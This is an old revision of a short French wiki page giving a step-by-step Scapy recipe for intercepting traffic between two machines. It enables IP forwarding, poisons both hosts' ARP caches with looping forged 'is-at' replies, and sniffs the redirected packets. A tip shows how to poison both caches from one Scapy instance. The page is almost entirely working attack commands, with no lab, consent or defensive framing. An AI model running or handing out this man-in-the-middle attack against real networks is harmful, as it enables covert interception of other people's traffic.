python:scapy:network_spoofing

Ceci est une ancienne révision du document !

Spoofer le réseau avec Scapy

Récupérer le trafic entre les machines A et B:

  1. Activer le routage des paquets: 
    sudo sysctl net/ipv4/ip_forward=1
  2. Adapter le parefeu (pas de règles bizarres)
  3. Cache-poisoning des tables ARP de A et B: 
    sendp(Ether() / ARP(op="is-at", psrc="<ipA>", pdst="<ipB>"), inter=RandNum(10,40), loop=1)

    L'intervalle de temps varie entre 10 et 40 secondes (pas obligatoire), s'exécute en boucle. Faire la même chose en inversant les deux IP.

  4. Sniffer le réseau:
    pkts = sniff(filter="host <ipA> or host <ipB>", prn=lambda p: p.summary)

Astuce: pour éviter de lancer deux instances de Scapy pour corrompre les tables: 

pkts = [ARP(op="is-at", psrc="<ipA>", pdst="<ipB>"), ARP(op="is-at", psrc="<ipB>", pdst="<ipA>")]
srploop(pkts, inter=1, store=False)

store=False permet d'éviter de stocker en mémoire les paquets, pour préserver la RAM.

  • python/scapy/network_spoofing.1539723735.txt.gz
  • Dernière modification : 2021/04/04 17:01
  • (modification externe)